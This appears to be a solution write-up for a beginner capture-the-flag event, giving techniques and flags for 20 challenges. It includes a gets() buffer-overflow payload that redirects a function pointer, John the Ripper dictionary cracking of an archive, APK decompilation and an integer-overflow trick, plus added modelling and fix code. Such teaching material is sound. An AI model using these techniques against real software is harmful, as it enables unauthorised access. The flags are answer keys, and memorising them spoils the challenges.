Uploaded by prat0ham

CRYPTOHUNT 2.0

Solutions

1. Can you convert the number 129 (base 10) to binary (base 2)?

# Python 3
>>> bin(129)
'0b10000001'

TCF{10000001}

2. If we give you a hex (596f75476f74546869734f6e65546f6f), can you find the string from it?

# Python 3
>>> bytes.fromhex('596f75476f74546869734f6e65546f6f').decode('utf-8')
'YouGotThisOneToo'

TCF{YouGotThisOneToo}

3. The flag is in front of you. Now you have to find it with your MIND.
Image
The image gives the positions of letters in the English alphabet. Simply replace each number with
the corresponding letter to get the flag.

TCF{STRINGVILLA}

4. The forest beholds all the secrets. Can you find the one we are looking for?
Forest
Download the image and open it in hex mode. The flag is appended at the end of the file.

TCF{APictureWorthAThousandWords}

5. Lex wants to secure access to his room, so he creates a Java program to protect his room with a
password. Given the Java program below, can you crack the code to his first room?
Source
The attached file is Java source code. Open it and the flag can be found towards the end of the
file.

TCF{DoYouReallyWantToEnterTheRoom?}

6. How do you hide a message in a static website? HTML? CSS? JS?


Webpage
Visit the linked webpage and view its source. A CSS file, jisafkhajgsdask.css, is loaded; open
that to get the flag.

TCF{YouGuessedItRightCSS}

7. We give you a file. You can't run it. But the file has the flag. Uhm! How can you find it?
File
Run the strings command on the attached file and search its output for the flag (use a regex to
look for anything matching the flag format).

$ strings strings | grep -oh "TCF{\w*}"
TCF{TheFlagIsHereRightHere}

TCF{TheFlagIsHereRightHere}

8. Caesar Cipher. Well the file has the Flag, but does it?
File
The flag is encoded with a Caesar cipher with shift +11. You can brute-force the shift and look for
the output that makes sense.

TCF{damnityouaresmart}

9. Lex knows you cracked the first one. That was easy. Not so easy this time.
Source
The attached Java file has a method that validates the password character by character. You can use
this to build up the password and get the flag.

TCF{PasswordIsImpenetrableButYouHack}

10. How well do you know about the Extensions


File
To check the type of content in the file (irrespective of the extension), you can either check the
header of the file and compare it against the magic numbers of known file types, or simply
use the file command.

$ file theFile.txt
theFile.txt: JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 648x1210, components 3

We can see the file is a JPEG image. Open it with any image viewer (or rename the extension to
.jpg) to get the flag.

TCF{YOU_MADE_IT_WITH_EXTENSIONS}
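
One way to script the magic-number comparison described above, added here as an example rather than code from the original write-up. The signature table covers only a few common formats, and the sample header is constructed to match the JFIF header that file reports.

```python
import os

# (magic bytes, detected type, extensions that are consistent with it)
MAGIC_NUMBERS = [
    (b"\xff\xd8\xff", "jpeg", {".jpg", ".jpeg"}),
    (b"\x89PNG\r\n\x1a\n", "png", {".png"}),
    (b"GIF87a", "gif", {".gif"}),
    (b"GIF89a", "gif", {".gif"}),
    (b"%PDF-", "pdf", {".pdf"}),
    (b"PK\x03\x04", "zip", {".zip", ".jar", ".apk"}),
    (b"7z\xbc\xaf\x27\x1c", "7z", {".7z"}),
    (b"\x7fELF", "elf", {"", ".so", ".elf"}),
]


def sniff(header):
    """Return (type, allowed extensions) for the first matching signature."""
    for magic, kind, extensions in MAGIC_NUMBERS:
        if header.startswith(magic):
            return kind, extensions
    return None, set()


def check_extension(filename, header):
    """Return (detected type, True if the extension disagrees with it)."""
    kind, extensions = sniff(header)
    extension = os.path.splitext(filename)[1].lower()
    return kind, kind is not None and extension not in extensions


def check_file(path):
    """Read only the first bytes of a file on disk and run the same check."""
    with open(path, "rb") as handle:
        return check_extension(path, handle.read(16))


# Constructed sample: SOI marker plus a JFIF APP0 segment (length 16, v1.01).
JFIF_HEADER = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01\x01"

if __name__ == "__main__":
    print(check_extension("theFile.txt", JFIF_HEADER))  # JPEG content, .txt name
    print(check_extension("photo.jpg", JFIF_HEADER))
    print(check_extension("notes.txt", b"plain text"))
```

An unrecognised header returns a type of None and no mismatch, so the check flags only files whose content is positively identified as something other than what the name claims.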

11. Show your skill of website and catch the flag.


Webpage
Check the source of the attached file. The flag is split into 3 parts:

1/3 is in a comment in html file

2/3 is in a comment in mycss.css file

3/3 is in a comment in myjs.js file

TCF{tru3_farm3r5_0r_ju5t_lucky?9df7e69a}

12. Can You Unzip this File ? If yes then find the Flag. If No, Be like Sherlock.
File
Extract the attached file with the password cryptohunt.

TCF{unz1pp1ng_1s_3a5y}

13. Secure Webpages are hard to crack. Our friend Antonio Provided security. Can you crack it?
Webpage
The flag can be found in the file adfjhbakjdvaihdfv.js that is loaded with the webpage.

TCF{PasswordInPlainJSNotSoSecure}

14. Lex is pretty sure, someone is hacking into his door. He ordered Highlevel security. Go ahead
Agent, crack it!
Source
The checkPassword method in the attached file can be traced to get the flag.
TCF{jU5t_a_s1mpl3_an4gr4m_4_u_c79a21}

15. You came a long way. Come see my first website.


Website
Visiting the website and checking the source, we can see a comment that says only robots can
read the flag. The flag is inside another html file that is mentioned in the robots.txt file.

TCF{I_aM_nOt_A_rObOt?AS25LW}

16. Time to fight your way in


File
The password for the archive can be found by bruteforcing the password against the rockyou.txt
dictionary file.
(Using John the Ripper)

$ /usr/share/john/7z2john.pl Q16.7z > Q16.hash
$ john --wordlist=/usr/share/wordlists/rockyou.txt Q16.hash
chocolate (Q16.7z)

The password is chocolate

TCF{i_Am_StRoNk!69ty420}

17. Let's get mobile.


Application
The attached file is an Android application. You can use Bytecode-Viewer to decompile the
application and view the .class files. The password can be found by tracing the
checkPassword method in the class file com/tcf/q17/Password$Companion.class

TCF{i_CaN_rEaD_jAvA!28fe7}

18. Given a binary, execute it and get the flag. Simple?


Source
Binary
From the given source, we can see that the flag is generated by the win() function, so we have
to somehow call that function in the binary. We also see that main() uses gets() to read its
input. gets() is vulnerable to buffer overflow: our input can spill past the end of the input
buffer and overwrite the fp pointer, which can then be used to call the win function. To do so,
we find the address of win() and overflow the input buffer of gets() so that this address
lands in fp.

$ objdump -d breakMe | grep '<win>'
080491d6 <win>:
$ perl -e 'print "A"x64 . "\xd6\x91\x04\x08\n"' | ./breakMe
Whooaa, thats a lot of text, jumping to 0x080491d6
TCF{wE_hAvE_a_HaCkEr_AmOnG_uS!pr0}

TCF{wE_hAvE_a_HaCkEr_AmOnG_uS!pr0}
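
Why the payload above has that shape, and what a bounded read changes, as an added Python model (not the challenge's C source and not part of the original write-up). It assumes fp sits directly after a 64-byte buffer, which is what the 64 bytes of padding imply; ORIGINAL_FP and the function names are constructed.

```python
import struct

BUF_SIZE = 64             # the payload above pads with 64 "A" bytes
FP_OFFSET = BUF_SIZE      # assumption: fp sits directly after the buffer
WIN_ADDR = 0x080491D6     # address of win() from the objdump output above
ORIGINAL_FP = 0x11111111  # constructed placeholder for fp's initial value


def new_frame():
    """Model the adjacent locals: a 64-byte buffer followed by a 4-byte fp."""
    frame = bytearray(BUF_SIZE + 4)
    struct.pack_into("<I", frame, FP_OFFSET, ORIGINAL_FP)
    return frame


def read_fp(frame):
    """fp is stored little-endian on x86, hence the reversed bytes in the payload."""
    return struct.unpack_from("<I", frame, FP_OFFSET)[0]


def model_gets(frame, line):
    """gets(buf): copies up to the newline, then a NUL, with no length limit."""
    data = line.split(b"\n", 1)[0] + b"\x00"
    for offset, byte in enumerate(data):
        if offset < len(frame):   # the model ends here; real memory does not
            frame[offset] = byte
    return frame


def model_fgets(frame, line, size=BUF_SIZE):
    """fgets(buf, size, stdin): stores at most size - 1 bytes plus a NUL."""
    data = line[:size - 1]
    newline = data.find(b"\n")
    if newline != -1:
        data = data[:newline + 1]  # fgets keeps the newline when it fits
    frame[:len(data)] = data
    frame[len(data)] = 0
    return frame


# The same bytes the perl one-liner above prints.
PAYLOAD = b"A" * BUF_SIZE + struct.pack("<I", WIN_ADDR) + b"\n"

if __name__ == "__main__":
    print(hex(read_fp(model_gets(new_frame(), PAYLOAD))))   # fp replaced
    print(hex(read_fp(model_fgets(new_frame(), PAYLOAD))))  # fp untouched
```

The fix in the C source is the same substitution: read with fgets(buf, sizeof buf, stdin) instead of gets(), so no input length can reach fp.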

19. Let's build from the ground up


Image
On observing the attached image closely, it can be guessed that the flag may be encoded as the
length of the lines, i.e., we can count how many pixels long a line is and convert that number to
its corresponding ASCII character. To do so, the following simple Python script can be used:

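from PIL import Image

# Convert to RGB so every pixel is a 3-tuple that can be compared with `black`.
image = Image.open('q19.png').convert('RGB')
width, height = image.size  # PIL returns (width, height)
pixels = image.load()
black = (0, 0, 0)

# Map each row (y) to the x positions of its non-black pixels.
rows = dict()
for x in range(width):
    for y in range(height):
        if pixels[x, y] != black:
            rows.setdefault(y, []).append(x)

# The right-most x of each line, minus 100, is the ASCII code of one character.
for y in rows:
    print(chr(max(rows[y]) - 100), end='')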

TCF{nOw_ThIs_Is_GeTtInG_sErIoUs}

20. Let's break in the flag bank


Source
Binary
After checking the source, one can conclude that they have to somehow overflow the value of the
int variable used to increase the current balance. This can be done by repeatedly purchasing the
fake flags and passing quantity with a value that will overflow the int range. Since there are no
checks for the corner cases, the currentBalance will increase instead of decreasing after every
purchase.

TCF{yOu_SiR_hAvE_mY_rEsPeCt!p0gch@mp}
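
A model of the arithmetic described above, added here as an example (it is not the challenge's source). wrap_int32 imitates a 32-bit int wrapping around, and the price, balance and function names are assumptions; buy_checked shows the bounds test the explanation says is missing.

```python
INT_MAX = 2**31 - 1


def wrap_int32(value):
    """Reduce a Python int to what a wrapping 32-bit signed int would hold."""
    return (value + 2**31) % 2**32 - 2**31


def buy_unchecked(balance, price, quantity):
    """Purchase logic with no range checks: returns (new balance, accepted)."""
    cost = wrap_int32(price * quantity)   # wraps negative for a large quantity
    if cost > balance:                    # a negative cost always passes this
        return balance, False
    return wrap_int32(balance - cost), True


def buy_checked(balance, price, quantity):
    """Same purchase, rejecting inputs whose product cannot fit in an int."""
    if price <= 0 or quantity <= 0:
        return balance, False
    if quantity > INT_MAX // price:       # price * quantity would overflow
        return balance, False
    cost = price * quantity
    if cost > balance:
        return balance, False
    return balance - cost, True


# Constructed values: the page gives neither the price nor the starting balance.
BALANCE, PRICE, BIG_QUANTITY = 1100, 900, 3_000_000

if __name__ == "__main__":
    print(buy_unchecked(BALANCE, PRICE, 1))             # normal purchase
    print(buy_unchecked(BALANCE, PRICE, BIG_QUANTITY))  # balance goes up
    print(buy_checked(BALANCE, PRICE, BIG_QUANTITY))    # rejected
```

Signed overflow is undefined behaviour in C, so wrapping is only the usual observed outcome; the pre-multiplication check in buy_checked avoids the overflow instead of relying on it.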
